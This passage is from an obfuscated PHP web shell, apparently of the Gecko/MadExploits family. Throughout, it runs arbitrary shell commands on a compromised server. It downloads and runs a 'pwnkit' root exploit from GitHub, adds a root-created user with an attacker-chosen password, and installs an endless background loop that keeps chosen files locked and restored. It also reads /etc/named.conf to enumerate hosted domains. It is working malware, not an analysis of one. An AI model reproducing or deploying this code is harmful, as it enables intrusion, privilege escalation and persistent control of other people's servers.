  1121.     ${"GLOBALS"}["jcvjybokqux"] = "URL";
  1122.     ${${"GLOBALS"}["jcvjybokqux"]} = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php";
  1123.     if (!${${"GLOBALS"}["oichbkmzrll"]}[3]("adminer.php")) {
  1124.         $cobwbfqqduim = "fungsi";
  1125.         $kvjkcnn = "URL";
  1126.         cmd("wget " . ${$kvjkcnn} . " -O adminer.php --quiet");
  1127.         echo "<meta http-equiv="refresh\" content="0;url=?d=" . hx(${$cobwbfqqduim}[0]()) . "\">";
  1128.     }
  1129. }
  1130. if ($_GET["terminal"] == "root") {
  1131.     ${"GLOBALS"}["rfwqmutpdy"] = "fungsi";
  1132.     if (!${${"GLOBALS"}["rfwqmutpdy"]}[3]("pwnkit")) {
  1133.         cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
  1134.         ${"GLOBALS"}["tnjtxafjygt"] = "fungsi";
  1135.         cmd("chmod +x pwnkit");
  1136.         echo cmd("./pwnkit id > .mad-root");
  1137.         echo "<meta http-equiv="refresh\" content=\"0;url=?d=" . hx(${${"GLOBALS"}["tnjtxafjygt"]}[0]()) . "&terminal=root">";
  1138.    }
  1139. }
  1140. if (isset($_POST["submit-action"])) {
  1141.    $dvyggfaifhal = "items";
  1142.    ${$dvyggfaifhal} = $_POST["check"];
  1143.    if ($_POST["gecko-select"] == "delete") {
  1144.        foreach (${${"GLOBALS"}["wsmiqmj"]} as ${${"GLOBALS"}["hcoospnffxw"]}) {
  1145.            ${"GLOBALS"}["gybkrqfv"] = "fd";
  1146.            $hflksuh = "fd";
  1147.            $blcjto = "fd";
  1148.            $hrlurq = "fungsi";
  1149.            ${"GLOBALS"}["zujcwhq"] = "repl";
  1150.            ${${"GLOBALS"}["gsulzioh"]} = str_replace("\", "/", ${$hrlurq}[0]());
  1151.            ${${"GLOBALS"}["gybkrqfv"]} = ${${"GLOBALS"}["zujcwhq"]} . "/" . ${${"GLOBALS"}["hcoospnffxw"]};
  1152.            if (is_dir(${$blcjto}) || is_file(${$hflksuh})) {
  1153.                $gnetoshcg = "fd";
  1154.                ${"GLOBALS"}["yzhtwsn"] = "fd";
  1155.                $ivhfruxuecjx = "rmdir";
  1156.                ${${"GLOBALS"}["nfnomta"]} = unlinkDir(${$gnetoshcg});
  1157.                ${${"GLOBALS"}["gpqxlxle"]} = ${${"GLOBALS"}["snxjpduol"]}[24](${${"GLOBALS"}["yzhtwsn"]});
  1158.                if (${$ivhfruxuecjx} || ${${"GLOBALS"}["gpqxlxle"]}) {
  1159.                    success();
  1160.                } else {
  1161.                    failed();
  1162.                }
  1163.            }
  1164.        }
  1165.    }
  1166. }
  1167. if (isset($_POST["submit"])) {
  1168.    if ($_POST["create_folder"] == true) {
  1169.        $ypqokprwpmng = "fungsi";
  1170.        $gdpguhc = "NamaFolder";
  1171.        ${"GLOBALS"}["nctpkcloa"] = "NamaFolder";
  1172.        ${${"GLOBALS"}["nctpkcloa"]} = ${$ypqokprwpmng}[12]($_POST["create_folder"]);
  1173.        if (${$gdpguhc}) {
  1174.            success();
  1175.        } else {
  1176.            failed();
  1177.        }
  1178.    } else if ($_POST["create_file"] == true) {
  1179.        $uvybcnskmbw = "namaFile";
  1180.        ${"GLOBALS"}["blvdfqohru"] = "fungsi";
  1181.        ${"GLOBALS"}["qrdxikgzs"] = "namaFile";
  1182.        ${${"GLOBALS"}["qrdxikgzs"]} = ${${"GLOBALS"}["blvdfqohru"]}[13]($_POST["create_file"]);
  1183.        if (${$uvybcnskmbw}) {
  1184.            success();
  1185.        } else {
  1186.            failed();
  1187.        }
  1188.    } else if ($_POST["renameFile"] == true) {
  1189.        $ydnfxcqunmh = "renameFile";
  1190.        ${$ydnfxcqunmh} = ${${"GLOBALS"}["snxjpduol"]}[15](unx($_GET["re"]), $_POST["renameFile"]);
  1191.        if (${${"GLOBALS"}["qhxnggsf"]}) {
  1192.            success();
  1193.        } else {
  1194.            failed();
  1195.        }
  1196.    } else if ($_POST["chFile"]) {
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  1199.        if (${$wgnsecqi}) {
  1200.            success();
  1201.        } else {
  1202.            failed();
  1203.        }
  1204.    } else if (isset($_POST["add-username"]) && isset($_POST["add-password"])) {
  1205.        ${"GLOBALS"}["hxwkojkq"] = "fungsi";
  1206.        if (!${${"GLOBALS"}["hxwkojkq"]}[3]("pwnkit")) {
  1207.            cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
  1208.             cmd("chmod +x pwnkit");
  1209.             ${"GLOBALS"}["sqwlnasx"] = "fungsi";
  1210.             cmd("./pwnkit \"id\" > .mad-root");
  1211.             echo "<meta http-equiv="refresh" content=\"0;url=?d=" . hx(${${"GLOBALS"}["sqwlnasx"]}[0]()) . "&rooting=True">";
  1212.        } else if (${${"GLOBALS"}["snxjpduol"]}[3](".mad-root")) {
  1213.            $cbzwrut = "response";
  1214.            ${$cbzwrut} = ${${"GLOBALS"}["snxjpduol"]}[11](".mad-root");
  1215.            $eshdcuwg = "response";
  1216.            ${${"GLOBALS"}["ideydyre"]} = explode(" ", ${$eshdcuwg});
  1217.            if (${${"GLOBALS"}["ideydyre"]}[0] == "uid=0(root)") {
  1218.                $snjesqrgx = "username";
  1219.                ${${"GLOBALS"}["fqwhcuj"]} = $_POST["add-username"];
  1220.                ${"GLOBALS"}["wupnbhiku"] = "username";
  1221.                ${${"GLOBALS"}["ohmuswhkxx"]} = $_POST["add-password"];
  1222.                cmd("./pwnkit "useradd " . ${${"GLOBALS"}["wupnbhiku"]} . " ; echo -e "" . ${${"GLOBALS"}["ohmuswhkxx"]} . "
  1223. " . ${${"GLOBALS"}["ohmuswhkxx"]} . "\" | passwd " . ${$snjesqrgx} . "\"");
  1224.             } else {
  1225.                 echo "<meta http-equiv=\"refresh\" content="0;url=?d=" . hx(${${"GLOBALS"}["snxjpduol"]}[0]()) . "&adduser=failed">";
  1226.             }
  1227.         }
  1228.     } else if ($_POST["lockfile"] == true) {
  1229.         ${"GLOBALS"}["hgdortc"] = "hndlers";
  1230.         $cxichofrfpho = "hndlers";
  1231.         ${"GLOBALS"}["wupvrlsyhjk"] = "handler";
  1232.         $jjwvypro = "flesName";
  1233.         $moysjvktwc = "fungsi";
  1234.         ${"GLOBALS"}["tneuvl"] = "fungsi";
  1235.         $gnyihl = "flesName";
  1236.         ${"GLOBALS"}["dljidwsezi"] = "TmpNames";
  1237.         $gekesqmsi = "flesName";
  1238.         $wzsgwh = "flesName";
  1239.         $rsebcsqvk = "fungsi";
  1240.         ${"GLOBALS"}["cduzexfwcry"] = "TmpNames";
  1241.         $yyhjqlb = "fungsi";
  1242.         $yvfdddxa = "fungsi";
  1243.         ${$jjwvypro} = $_POST["lockfile"];
  1244.         ${${"GLOBALS"}["dljidwsezi"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
  1245.         $rzhnqvtsnc = "flesName";
  1246.         if (file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rsebcsqvk}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . remove_dot(${$wzsgwh}) . "-text")) {
  1247.             $rlgzkhpyjs = "fungsi";
  1248.             ${"GLOBALS"}["diqyijl"] = "TmpNames";
  1249.             $vdjkeffd = "fungsi";
  1250.             cmd("rm -rf " . ${${"GLOBALS"}["diqyijl"]} . "/.sessions/." . base64_encode(${$vdjkeffd}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file"));
  1251.             cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rlgzkhpyjs}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler"));
  1252.         }
  1253.         mkdir(${${"GLOBALS"}["nfodbdej"]} . "/.sessions");
  1254.         ${"GLOBALS"}["vbpycrxw"] = "flesName";
  1255.         ${"GLOBALS"}["vqwwmxfkebq"] = "fungsi";
  1256.         cmd("cp $flesName " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$rzhnqvtsnc}) . "-text-file"));
  1257.         chmod(${$gnyihl}, 0444);
  1258.         ${${"GLOBALS"}["wupvrlsyhjk"]} = "
  1259. <?php
  1260. @ini_set("max_execution_time", 0);
  1261. while (True){
  1262.    if (!file_exists("" . ${$yvfdddxa}[0]() . "")){
  1263.        mkdir(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "");
  1264.     }
  1265.     if (!file_exists("" . ${${"GLOBALS"}["tneuvl"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "\")){
  1266.        \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file") . "\"));
  1267.        file_put_contents(\"" . ${$moysjvktwc}[0]() . "/" . ${$gekesqmsi} . "\", base64_decode(\$text));
  1268.    }
  1269.    if (gecko_perm(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "") != 0444){
  1270.         chmod(\"" . ${${"GLOBALS"}["vqwwmxfkebq"]}[0]() . "/" . ${${"GLOBALS"}["vbpycrxw"]} . "\", 0444);
  1271.    }
  1272. }
  1274. function gecko_perm(\$flename){
  1275.    return substr(sprintf(\"%o", fileperms(\$flename)), -4);
  1276. }
  1277. ";
  1278.        ${${"GLOBALS"}["hgdortc"]} = ${$yyhjqlb}[28](${${"GLOBALS"}["cduzexfwcry"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
  1279.        if (${$cxichofrfpho}) {
  1280.            cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . " > /dev/null 2>/dev/null &");
  1281.        } else {
  1282.            failed();
  1283.        }
  1284.    }
  1285. }
  1286. function success()
  1287. {
  1288.    echo "<meta http-equiv=\"refresh\" content=\"0;url=?d=" . hx($GLOBALS["fungsi"][0]()) . "&response=success\">";
  1289. }
  1290. function failed()
  1291. {
  1292.     echo "<meta http-equiv="refresh\" content=\"0;url=?d=" . hx($GLOBALS["fungsi"][0]()) . "&response=failed">";
  1293. }
  1294. function formatSize($bytes)
  1295. {
  1296.    $irgjoi = "types";
  1297.    ${"GLOBALS"}["dipopqio"] = "bytes";
  1298.    ${$irgjoi} = array("<span class="file-size">B</span>", "<span class=\"file-size\">KB</span>", "<span class="file-size">MB</span>", "<span class=\"file-size">GB</span>", "<span class="file-size">TB</span>");
  1299.    for (${${"GLOBALS"}["syglgogire"]} = 0; ${${"GLOBALS"}["vrqmqvvo"]} >= 1024 && ${${"GLOBALS"}["syglgogire"]} < (count(${${"GLOBALS"}["tljbiml"]}) - 1); ${${"GLOBALS"}["dipopqio"]} /= 1024, ${${"GLOBALS"}["syglgogire"]}++);
  1300.    return (round(${${"GLOBALS"}["vrqmqvvo"]}, 2) . " " . ${${"GLOBALS"}["tljbiml"]}[${${"GLOBALS"}["syglgogire"]}]);
  1301. }
  1302. function hx($n)
  1303. {
  1304.    $letvlrhlzxe = "i";
  1305.    $acfpucvhvd = "i";
  1306.    ${${"GLOBALS"}["xcntuxiflw"]} = "";
  1307.    for (${$letvlrhlzxe} = 0; ${$acfpucvhvd} < strlen(${${"GLOBALS"}["qhksqaif"]}); ${${"GLOBALS"}["syglgogire"]}++) {
  1308.        ${${"GLOBALS"}["xcntuxiflw"]} .= dechex(ord(${${"GLOBALS"}["qhksqaif"]}[${${"GLOBALS"}["syglgogire"]}]));
  1309.    }
  1310.    return ${${"GLOBALS"}["xcntuxiflw"]};
  1311. }
  1312. function unx($y)
  1313. {
  1314.    ${"GLOBALS"}["evbpwnu"] = "y";
  1315.    ${${"GLOBALS"}["qhksqaif"]} = "";
  1316.    ${"GLOBALS"}["lneggsfybz"] = "i";
  1317.    for (${${"GLOBALS"}["lneggsfybz"]} = 0; ${${"GLOBALS"}["syglgogire"]} < strlen(${${"GLOBALS"}["evbpwnu"]}) - 1; ${${"GLOBALS"}["syglgogire"]} += 2) {
  1318.        $dsskas = "i";
  1319.        $fznghhqgmy = "y";
  1320.        $wsgjklsdlmh = "y";
  1321.        ${${"GLOBALS"}["qhksqaif"]} .= chr(hexdec(${$wsgjklsdlmh}[${$dsskas}] . ${$fznghhqgmy}[${${"GLOBALS"}["syglgogire"]} + 1]));
  1322.    }
  1323.    return ${${"GLOBALS"}["qhksqaif"]};
  1324. }
  1325. function suggest_exploit()
  1326. {
  1327.    ${"GLOBALS"}["dgzbftzjuwo"] = "uname";
  1328.    $scgjesnbs = "uname";
  1329.    ${"GLOBALS"}["qfjupzstsx"] = "xpld";
  1330.    $qethrlp = "pl";
  1331.    ${${"GLOBALS"}["dgzbftzjuwo"]} = $GLOBALS["fungsi"][8]();
  1332.    ${"GLOBALS"}["kdimvnzsdr"] = "pl";
  1333.    ${${"GLOBALS"}["xvbovn"]} = explode(" ", ${$scgjesnbs});
  1334.    ${${"GLOBALS"}["ivoqwpbeyh"]} = explode("-", ${${"GLOBALS"}["xvbovn"]}[2]);
  1335.    ${$qethrlp} = explode(".", ${${"GLOBALS"}["qfjupzstsx"]}[0]);
  1336.    return ${${"GLOBALS"}["yxxjlgbcy"]}[0] . "." . ${${"GLOBALS"}["yxxjlgbcy"]}[1] . "." . ${${"GLOBALS"}["kdimvnzsdr"]}[2];
  1337. }
  1338. function s()
  1339. {
  1340.    $vdgikwqorbx = "d0mains";
  1341.    ${$vdgikwqorbx} = @$GLOBALS["fungsi"][7]("/etc/named.conf", false);
  1342.    if (!${${"GLOBALS"}["myqqvzxfwnl"]}) {
  1343.        $xrxbnliohoq = "dom";
  1344.        ${$xrxbnliohoq} = "<font color=red size=2px>Cant Read [ /etc/named.conf ]</font>";
  1345.        $GLOBALS["need_to_update_header"] = "true";
  1346.    } else {
  1347.        ${"GLOBALS"}["mrvtghyqwu"] = "dom";
  1348.        ${"GLOBALS"}["qpclqku"] = "d0mains";
  1349.        ${${"GLOBALS"}["exkwiu"]} = 0;
  1350.        foreach (${${"GLOBALS"}["qpclqku"]} as ${${"GLOBALS"}["jbxzmvsqntn"]}) {
  1351.            ${"GLOBALS"}["chxwvcxjp"] = "d0main";
  1352.            if (@strstr(${${"GLOBALS"}["chxwvcxjp"]}, "zone")) {
  1353.                ${"GLOBALS"}["mwehtriwwmy"] = "domains";
  1354.                $rvjwavibhni = "domains";
  1355.                preg_match_all("#zone "(.*)\"#", ${${"GLOBALS"}["jbxzmvsqntn"]}, ${$rvjwavibhni});
  1356.                flush();
  1357.                 if (strlen(trim(${${"GLOBALS"}["mwehtriwwmy"]}[1][0])) > 2) {
  1358.                     flush();
  1359.                     ${${"GLOBALS"}["exkwiu"]}++;
  1360.                 }
  1361.             }
  1362.         }
  1363.         ${${"GLOBALS"}["mrvtghyqwu"]} = "$count Domain";
  1364.     }
  1365.     return ${${"GLOBALS"}["tcirhful"]};
  1366. }
  1367. function cmd($in, $re = false)
  1368. {
  1369.     ${${"GLOBALS"}["ftlwdhcjjlb"]} = "";
  1370.     try {
  1371.         $hvwbptfprwq = "in";
  1372.         if (${${"GLOBALS"}["ylnznsnqbkvh"]}) ${${"GLOBALS"}["oplcdvp"]} = ${$hvwbptfprwq} . " 2>&1";
  1373.         if (function_exists("exec")) {
  1374.             @$GLOBALS["fungsi"][16](${${"GLOBALS"}["oplcdvp"]}, ${${"GLOBALS"}["ftlwdhcjjlb"]});
  1375.             ${"GLOBALS"}["dcgyuqbn"] = "out";
  1376.             ${${"GLOBALS"}["dcgyuqbn"]} = @join("
  1377. ", ${${"GLOBALS"}["ftlwdhcjjlb"]});
  1378.         } elseif (function_exists("passthru")) {
  1379.             $zbxdghsew = "out";
  1380.             ob_start();
  1381.             @$GLOBALS["fungsi"][17](${${"GLOBALS"}["oplcdvp"]});
  1382.             ${$zbxdghsew} = ob_get_clean();
  1383.         } elseif (function_exists("system")) {
  1384.             $npbiyvsnodo = "in";
  1385.             ob_start();
  1386.             @$GLOBALS["fungsi"][18](${$npbiyvsnodo});
  1387.             ${${"GLOBALS"}["ftlwdhcjjlb"]} = ob_get_clean();
  1388.         } elseif (function_exists("shell_exec")) {
  1389.             $djxmmjga = "in";
  1390.             ${${"GLOBALS"}["ftlwdhcjjlb"]} = $GLOBALS["fungsi"][19](${$djxmmjga});
  1391.         } elseif (function_exists("popen") && function_exists("pclose")) {
  1392.             ${"GLOBALS"}["cnfoyrl"] = "in";
  1393.             if (is_resource(${${"GLOBALS"}["rwpikbcwrgi"]} = @$GLOBALS["fungsi"][20](${${"GLOBALS"}["cnfoyrl"]}, "r"))) {
  1394.                 ${"GLOBALS"}["qkzcmqqkfk"] = "f";
  1395.                 ${"GLOBALS"}["ituqznedgim"] = "f";
  1396.                 ${${"GLOBALS"}["ftlwdhcjjlb"]} = "";
  1397.                 ${"GLOBALS"}["gflvxsrnfo"] = "out";
  1398.                 while (!@feof(${${"GLOBALS"}["rwpikbcwrgi"]})) ${${"GLOBALS"}["gflvxsrnfo"]} .= fread(${${"GLOBALS"}["ituqznedgim"]}, 1024);
  1399.                 $GLOBALS["fungsi"][21](${${"GLOBALS"}["qkzcmqqkfk"]});
  1400.             }
  1401.         } elseif (function_exists("proc_open")) {
  1402.             $ujcfwptmp = "in";
  1403.             ${"GLOBALS"}["xakxtubpwf"] = "pipes";
  1404.             ${"GLOBALS"}["hopxspef"] = "process";
  1405.             $ubbytmnb = "out";
  1406.             ${${"GLOBALS"}["xakxtubpwf"]} = array();
  1407.             ${${"GLOBALS"}["hopxspef"]} = @$GLOBALS["fungsi"][23](${$ujcfwptmp} . " 2>&1", array(array("pipe", "w"), array("pipe", "w"), array("pipe", "w")), ${${"GLOBALS"}["yqdkwiyd"]}, null);
  1408.             ${$ubbytmnb} = @$GLOBALS["fungsi"][22](${${"GLOBALS"}["yqdkwiyd"]}[1]);
  1409.         } elseif (class_exists("COM")) {
  1410.             $gplhjlxmqncr = "alfaWs";
  1411.             ${"GLOBALS"}["twqksukbvd"] = "stdout";
  1412.             ${$gplhjlxmqncr} = new COM("WScript.shell");
  1413.             ${${"GLOBALS"}["exvqbodeqcc"]} = $alfaWs->$GLOBALS["fungsi"][16]("cmd.exe /c " . $_POST["alfa1"]);
  1414.             ${${"GLOBALS"}["twqksukbvd"]} = $exec->StdOut();
  1415.             ${${"GLOBALS"}["ftlwdhcjjlb"]} = $stdout->ReadAll();
  1416.         }
  1417.     } catch (Exception $e) {
  1418.     }
  1419.     return $out;
  1420. }
  1421. function unlinkDir($dir)
  1422. {
  1423.     $mxcxuhqbgj = "i";
  1424.     ${${"GLOBALS"}["hoapkwhmi"]} = array(${${"GLOBALS"}["njgztpho"]});
  1425.     ${${"GLOBALS"}["sotsubd"]} = array();
  1426.     $noonhxdh = "dir";
  1427.     ${"GLOBALS"}["wbptvix"] = "dirs";
  1428.     for (${${"GLOBALS"}["syglgogire"]} = 0;; ${$mxcxuhqbgj}++) {
  1429.         ${"GLOBALS"}["pdcflzb"] = "dirs";
  1430.         if (isset(${${"GLOBALS"}["hoapkwhmi"]}[${${"GLOBALS"}["syglgogire"]}])) ${${"GLOBALS"}["njgztpho"]} = ${${"GLOBALS"}["pdcflzb"]}[${${"GLOBALS"}["syglgogire"]}];
  1431.         else break;
  1432.         if (${${"GLOBALS"}["lbdylir"]} = opendir(${${"GLOBALS"}["njgztpho"]})) {
  1433.             $mfttjdr = "readDir";
  1434.             $mfdlwx = "openDir";
  1435.             while (${$mfttjdr} = @readdir(${$mfdlwx})) {
  1436.                 if (${${"GLOBALS"}["nlqvcexcsqf"]} != "." && ${${"GLOBALS"}["nlqvcexcsqf"]} != "..") {
  1437.                     $tnlkxbt = "dir";
  1438.                     if ($GLOBALS["fungsi"][2](${$tnlkxbt} . "/" . ${${"GLOBALS"}["nlqvcexcsqf"]})) {
  1439.                         ${"GLOBALS"}["nnorxlnz"] = "dir";
  1440.                         ${"GLOBALS"}["hqwryip"] = "readDir";
  1441.                         ${${"GLOBALS"}["hoapkwhmi"]}[] = ${${"GLOBALS"}["nnorxlnz"]} . "/" . ${${"GLOBALS"}["hqwryip"]};
  1442.                     } else {
  1443.                         $okajffecrpe = "files";
  1444.                         ${"GLOBALS"}["syxnqhpm"] = "dir";
  1445.                         ${$okajffecrpe}[] = ${${"GLOBALS"}["syxnqhpm"]} . "/" . ${${"GLOBALS"}["nlqvcexcsqf"]};
  1446.                     }
  1447.                 }
  1448.             }
  1449.         }
  1450.     }
  1451.     foreach (${${"GLOBALS"}["sotsubd"]} as ${${"GLOBALS"}["eujpqmf"]}) {
  1452.         $GLOBALS["fungsi"][24](${${"GLOBALS"}["eujpqmf"]});
  1453.     }
  1454.     ${${"GLOBALS"}["hoapkwhmi"]} = array_reverse(${${"GLOBALS"}["wbptvix"]});
  1455.     foreach (${${"GLOBALS"}["hoapkwhmi"]} as ${$noonhxdh}) {
  1456.         $cxcsfelbfhu = "dir";
  1457.         $GLOBALS["fungsi"][25](${$cxcsfelbfhu});
  1458.     }
  1459. }
  1460. function remove_dot($file)
  1461. {
  1462.     ${"GLOBALS"}["jpfaiodwqo"] = "FILES";
  1463.     $dogkxkzkb = "FILES";
  1464.     ${$dogkxkzkb} = ${${"GLOBALS"}["eujpqmf"]};
  1465.     $pudflfwtqsq = "pch";
  1466.     $jwcffcesuian = "pch";
  1467.     ${$pudflfwtqsq} = explode(".", ${${"GLOBALS"}["jpfaiodwqo"]});
  1468.     return ${$jwcffcesuian}[0];
  1469. }
  1470. function perms($file)
  1471. {
  1472.     ${"GLOBALS"}["muhifdbszpx"] = "perms";
  1473.     $budbfbkwgim = "info";
  1474.     ${"GLOBALS"}["niqosh"] = "perms";
  1475.     $vkfyefzxen = "perms";
  1476.     $mshayo = "file";
  1477.     $qyigwvd = "perms";
  1478.     ${${"GLOBALS"}["snucwrjx"]} = $GLOBALS["fungsi"][6](${$mshayo});
  1479.     $yweukowba = "perms";
  1480.     ${"GLOBALS"}["etuurjljd"] = "perms";
  1481.     ${"GLOBALS"}["fpruwhymp"] = "perms";
  1482.     ${"GLOBALS"}["hoqhssjete"] = "perms";
  1483.     $vbbwezosh = "perms";
  1484.     $ydjzbkyoavu = "perms";
  1485.     ${"GLOBALS"}["wxwxtxk"] = "info";
  1486.     $bopusfto = "info";
  1487.     ${"GLOBALS"}["kireyz"] = "info";
  1488.     ${"GLOBALS"}["ahvxprf"] = "perms";
  1489.     ${"GLOBALS"}["dmvfhxchs"] = "info";
  1490.     if ((${${"GLOBALS"}["snucwrjx"]} & 0xC000) == 0xC000) {
  1491.         ${${"GLOBALS"}["wrrdfeiqpw"]} = "s";
  1492.     } elseif ((${$yweukowba} & 0xA000) == 0xA000) {
  1493.         ${${"GLOBALS"}["wrrdfeiqpw"]} = "l";
  1494.     } elseif ((${$qyigwvd} & 0x8000) == 0x8000) {
  1495.         ${"GLOBALS"}["ozvqvtmzoa"] = "info";
  1496.         ${${"GLOBALS"}["ozvqvtmzoa"]} = "-";
  1497.     } elseif ((${$vkfyefzxen} & 0x6000) == 0x6000) {
  1498.         ${${"GLOBALS"}["wrrdfeiqpw"]} = "b";
  1499.     } elseif ((${$vbbwezosh} & 0x4000) == 0x4000) {
  1500.         ${"GLOBALS"}["urcivwumrnb"] = "info";
  1501.         ${${"GLOBALS"}["urcivwumrnb"]} = "d";
  1502.     } elseif ((${${"GLOBALS"}["snucwrjx"]} & 0x2000) == 0x2000) {
  1503.         ${${"GLOBALS"}["wrrdfeiqpw"]} = "c";
  1504.     } elseif ((${${"GLOBALS"}["hoqhssjete"]} & 0x1000) == 0x1000) {
  1505.         $ygtvtpoq = "info";
  1506.         ${$ygtvtpoq} = "p";
  1507.     } else {
  1508.         ${${"GLOBALS"}["wrrdfeiqpw"]} = "u";
  1509.     }
  1510.     ${${"GLOBALS"}["wxwxtxk"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0100) ? "r" : "-");
  1511.     ${"GLOBALS"}["nmbuvcrctn"] = "info";
  1512.     ${$bopusfto} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0080) ? "w" : "-");
  1513.     ${${"GLOBALS"}["nmbuvcrctn"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0040) ? ((${${"GLOBALS"}["snucwrjx"]} & 0x0800) ? "s" : "x") : ((${${"GLOBALS"}["etuurjljd"]} & 0x0800) ? "S" : "-"));
  1514.     $gzdcjjppeft = "perms";
  1515.     ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${${"GLOBALS"}["fpruwhymp"]} & 0x0020) ? "r" : "-");
  1516.     $vczgyuadbh = "perms";
  1517.     ${${"GLOBALS"}["kireyz"]} .= ((${${"GLOBALS"}["muhifdbszpx"]} & 0x0010) ? "w" : "-");
  1518.     ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${$gzdcjjppeft} & 0x0008) ? ((${${"GLOBALS"}["ahvxprf"]} & 0x0400) ? "s" : "x") : ((${$vczgyuadbh} & 0x0400) ? "S" : "-"));
  1519.     $hybyysyp = "perms";
  1520.     ${${"GLOBALS"}["dmvfhxchs"]} .= ((${${"GLOBALS"}["snucwrjx"]} & 0x0004) ? "r" : "-");
  1521.     ${$budbfbkwgim} .= ((${${"GLOBALS"}["niqosh"]} & 0x0002) ? "w" : "-");
  1522.     ${${"GLOBALS"}["wrrdfeiqpw"]} .= ((${$hybyysyp} & 0x0001) ? ((${$ydjzbkyoavu} & 0x0200) ? "t" : "x") : ((${${"GLOBALS"}["snucwrjx"]} & 0x0200) ? "T" : "-"));
  1523.     return ${${"GLOBALS"}["wrrdfeiqpw"]};
  1524. } ?>
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